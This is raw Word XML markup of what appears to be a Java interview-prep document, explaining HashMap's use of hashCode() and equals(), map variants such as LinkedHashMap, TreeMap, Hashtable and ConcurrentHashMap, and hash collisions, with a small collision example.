    <w:p w14:paraId="741F2F73"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p1 is added to the map, its hashCode() method is called to determine the bucket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6C3727"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p1 is later retrieved, the hashCode() will be used again to find the bucket, and equals() will verify if p1 matches the key in the bucket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318CC4FC"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ieving</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006DCE18"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alling map.get(p1), the hashCode() is used to find the bucket, and equals() is used to compare p1 with the existing keys to get the correct value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F881A55"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Points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7366D76A"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Helps locate the correct bucket for a key. It’s used to determine the array index within the underlying array of the HashMap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B62ED1D"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Is used when there is a collision (multiple keys with the same hash code). It compares the keys in the bucket to find the correct key-value pair.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2F4D79"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A good implementation of hashCode() and equals() ensures the HashMap operates efficiently with minimal collisions, which improves performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C13CE78" w14:textId="77777777" w:rsidR="00C611E7" w:rsidRPr="00CE4B95"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3" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC556D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9" w:name="_Toc197867383"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are the types of HashMap?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="169"/>
    </w:p>
    <w:p w14:paraId="7778B6F2" w14:textId="01FDE84F" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E" w:rsidP="00084E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HashMap is a specific implementation of the Map interface, but there are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>several variants</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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go through the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>types of HashMap and its variations</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E92E03"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4" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6996DB37"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HashMap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBE785E"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p w14:paraId="6698A253"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p>
    <w:p w14:paraId="46FFB5AB"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1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p>
    <w:p w14:paraId="40FE8FDE" w14:textId="14E8EE03"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ordering guaranteed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE049E4" w14:textId="2154FD37" w:rsidR="000D2F04" w:rsidRPr="00CE4B95"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0C9264A"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5" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCEAA43"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LinkedHashMap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3666D430"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tends </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E6F50E"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if enabled)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3453D5BB"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lightly slower tha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ue to ordering overhead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB962DA" w14:textId="5B3EA706" w:rsidR="003C0520" w:rsidRPr="00CE4B95"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HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEFC48E"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when you want predictable iteration order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75545FFD"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26" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F3560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TreeMap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78815CA2"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s </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>NavigableMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52722400"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by keys (natural order or comparator)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0989F09C" w14:textId="7792B68D" w:rsidR="001D7F2E"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (throws NullPointerException), but allows null values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638CC2E4" w14:textId="756E7045" w:rsidR="001A3748" w:rsidRPr="00CE4B95"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p>
    <w:p w14:paraId="2C4CC7A0"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18930EDB"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27" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CADB735"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Hashtable (Legacy)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B089ED9"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synchronized version of HashMap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296803B0"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lower</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53311704" w14:textId="4B698033" w:rsidR="001D7F2E"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 or null values</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> allowed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4982C930" w14:textId="36C41E61" w:rsidR="00A53D79" w:rsidRPr="00CE4B95"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table</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8BA73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ly used in modern Java (replaced by ConcurrentHashMap).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE7B2D4"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oncurrentHashMap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE1BABA"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concurrent access</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in multithreaded environments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8A2752"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high performance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B48C49"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allow null keys or values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB1243A" w14:textId="5AC0F645" w:rsidR="001D7F2E"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in older versions; Java 8+ uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CAS and synchronized blocks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C1D0C6" w14:textId="292C4BA8" w:rsidR="003A7EE8" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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currentHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22586B2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28" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3512A18A"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CE4B95" w14:paraId="7997DA54" w14:textId="77777777" w:rsidTr="001D7F2E">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26CBE8B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1D7F2E" w:rsidRPr="00CE4B95" w14:paraId="2DE2FD92" w14:textId="77777777" w:rsidTr="001D7F2E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="519FC4D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6765AE6"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58A06B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B2F85AC"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927FB5E"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C3FC607" w14:textId="77777777" w:rsidTr="001D7F2E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78269B4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C782AB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90B9429"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1807D327" w14:textId="77777777" w:rsidTr="001D7F2E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="359CF248"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A671E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CC7620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6501499" w14:textId="77777777" w:rsidTr="001D7F2E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F3C2C4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for concurrent use)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7933186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29" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="383B498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CE4B95" w14:paraId="49110A99" w14:textId="77777777" w:rsidTr="001D7F2E">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5580CFD4"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commended Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w14:paraId="0FA48FDF" w14:textId="77777777" w:rsidTr="001D7F2E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DD05F0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r>
      <w:tr w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w14:paraId="189A89FF" w14:textId="77777777" w:rsidTr="001D7F2E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37301E87"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r>
      <w:tr w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w14:paraId="172B6B87" w14:textId="77777777" w:rsidTr="001D7F2E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7BACBE5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1D7F2E" w:rsidRPr="00CE4B95" w14:paraId="7BECBD22" w14:textId="77777777" w:rsidTr="001D7F2E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77C8C83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r>
      <w:tr w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w14:paraId="0BCEF0BE" w14:textId="77777777" w:rsidTr="001D7F2E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4420C8B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r>
    </w:tbl>
    <w:p w14:paraId="7CA80716" w14:textId="66FCD84C" w:rsidR="0049206B" w:rsidRPr="00CE4B95"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0" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4C1150" w14:textId="6DE41F52" w:rsidR="0049206B" w:rsidRPr="00CE4B95" w:rsidRDefault="0049206B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="170" w:name="_Toc197867384"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What happens in a HashMap when multiple keys have the same hashCode()??</w:t>
      </w:r>
      <w:bookmarkEnd w:id="170"/>
    </w:p>
    <w:p w14:paraId="2B72F6AE" w14:textId="07BD5A28" w:rsidR="00ED56FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00ED56FC">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 xml:space="preserve">If multiple keys return the same hashCode(), they will land in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>same bucket</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> inside the HashMap. This is known as a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hash collision</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>. To resolve this, Java uses the equals() method to check if the keys are actually the same or not.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746E2FEC" w14:textId="77777777" w:rsidR="00ED56FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00ED56FC" w:rsidP="00191593">
      <w:pPr>
        <w:ind w:firstLine="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true, the value is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>updated</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42317236" w14:textId="6716212E" w:rsidR="00ED56FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00ED56FC" w:rsidP="00191593">
      <w:pPr>
        <w:ind w:left="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false, the new key-value pair is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>added to the same bucket</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> (via a linked list or red-</w:t>
      </w:r>
      <w:r w:rsidR="00191593"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black tree).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5239498C" w14:textId="6676A7DB" w:rsidR="00ED56FC" w:rsidRPr="00CE4B95"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1" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7552687C" w14:textId="2C398B67" w:rsidR="0081471A" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55C77">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="171" w:name="_Toc197867385"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Can HashMap store different keys that have the same hashCode</w:t>
      </w:r>
      <w:r w:rsidR="0081471A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="171"/>
    </w:p>
    <w:p w14:paraId="757F59F3" w14:textId="7611AFB1" w:rsidR="0081471A" w:rsidRPr="00CE4B95" w:rsidRDefault="009A4BA6">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CE4B95" w:rsidRDefault="00531D55" w:rsidP="0049206B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D349F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E484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p>
    <w:p w14:paraId="57CC23C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D85858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6045AA"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065D586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614885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BF11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691BA98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43DD7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7793D8E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verride hashCode to always return same value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF4D20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34298AA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Cod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B88F6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0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B62CD8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7426E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5B04A0B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equals compares actual content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B95720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0F454F1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boolean</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> equals</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F6F9B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ue</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD5F62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obj </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>instanceo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alse</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24523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other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p>
    <w:p w14:paraId="023CE3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th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7500A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3BCED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7A102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8CA750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to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F90EC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32B88B6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A026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p>
    <w:p w14:paraId="5DDCE251" w14:textId="10B4783F"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Collis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E336F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C046A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3B63FD1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F1359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11A0F03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662B4C9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3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2625E69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170C0F5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44B63AD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1DFB9AE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8</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5872591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35D1E5D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06BFC7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B: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9C14F6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C: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8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680EF02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B859E8" w14:textId="4FF7DB2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3BB58454" w14:textId="77777777" w:rsidR="00531D55" w:rsidRPr="00CE4B95" w:rsidRDefault="00531D55" w:rsidP="0049206B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70FA2A77"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s Happening Internally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483C0D2B"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 equals() compares key string, so:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D77FAC0"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B") → false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDB50C5"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quals("C") → false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB6782C"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all keys are treated as distinct entries in the same bucket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EEFF9A" w14:textId="6ADCB1E6" w:rsidR="00324AE3" w:rsidRPr="00CE4B95"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2" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8C871F" w14:textId="3585D325" w:rsidR="00127D9B" w:rsidRPr="00CE4B95" w:rsidRDefault="00BC674E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
